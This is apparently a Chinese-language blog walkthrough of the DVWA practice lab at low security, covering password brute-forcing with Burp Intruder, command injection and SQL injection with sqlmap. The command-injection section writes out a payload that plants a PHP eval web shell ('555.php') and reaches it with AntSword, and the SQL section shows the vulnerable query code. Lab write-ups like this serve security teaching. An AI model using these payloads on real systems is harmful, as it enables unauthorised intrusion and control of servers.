DVWA通关文档

开始前

❗❗一定给自己的虚拟机拍摄一个快照,便于还原初始状态❗❗

⭐准备工具

burpsite(当然简单的请求可以用python写脚本自己跑)

中国蚁剑antsword

LOW security

Brute Force 蛮力法暴力破解

image-20240712202216694

在内嵌浏览器中拦截该次请求并发送到intruder爆破器,修改payload并进行爆破密码

image-20240712202549622

添加payload位置,在payload中加入字典,常用密码字典自己找找

image-20240712202831396

常用密码字典跑出来按长度排序发现长度不一样的就是正确密码

image-20240712203143284

Command Injection

前置知识:

ping,php,linux命令,连接符|,||,&,&&

image-20240713170432118

查看源码,windows系统ping四次自己结束

linux系统不会自动结束因此加上4次限制

直接执行shell exec里面的命令拼接

验证存在命令执行漏洞可以直接执行

键入127.0.0.1&pwd查看当前路径

image-20240712200746919

创建一个shell

127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > 555.php

会创建一个内容为

<?php @eval(\$_POST['test']);?>

的555.php,这是我们留下的后门木马

127.0.0.1|ls

image-20240712201251487

我们已经留下了555.php木马后门,用antsword添加数据获取shell

image-20240712201931889

现在已经获得了完整的权限

用完记得删 555.php

SQL injection

// Check database
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . 	   ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

sqlmap

kali系统自带

image-20240714081644767

-u //目的地址

--dbs // 列举数据库

--cookie //设置cookie

posted @ 2024-12-12 20:58  BUGCATCAPOO  阅读(10)  评论(0编辑  收藏  举报